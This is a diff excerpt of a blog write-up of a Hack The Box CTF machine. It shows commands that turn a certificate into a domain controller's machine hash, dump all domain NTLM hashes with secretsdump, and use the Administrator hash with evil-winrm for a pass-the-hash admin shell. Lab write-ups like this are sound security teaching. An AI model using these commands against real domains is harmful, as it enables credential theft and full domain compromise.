ret2desync/ret2desync.github.io/_posts/2022-07-17-htb-business-ctf-2022-Certification-writeup.md

 {% highlight csharp %}
 certipy auth -pfx cfn-svrdc01
 {% endhighlight %}
 This gives us the NTLM hash for the cfn-svrdc01 machine account.
 With this, we can then use Impacket's secretsdump to obtain all NTLM hashes for all uses in the domain (since this is a domain controller)/on the cfn-svrdc01 machine.

 {% highlight csharp %}
 secretsdump.py 'cfn-svrdc01$'@certification.htb -hashes :d85512d5e138a972140986b9cc664d7a
 {% endhighlight %}
 {% include figure image_path="/assets/img/secretsdump.png" %}
-With the Administrator hash, we can use evil-winrm to Pass-the-Hash and get a shell with administrator privileges on the machine and read the root.txt flag in C:\Users\Administrator\root.txt
+With the Administrator hash, we can use evil-winrm to Pass-the-Hash and get a shell with administrator privileges on the machine and read the root.txt flag in C:\Users\Administrator\Desktop\root.txt
 {% highlight csharp %}
 evil-winrm -i cfn-svrdc01.certification.htb -u administrator -H 30d9a71719214d675de29308730c0cb0
 {% endhighlight %}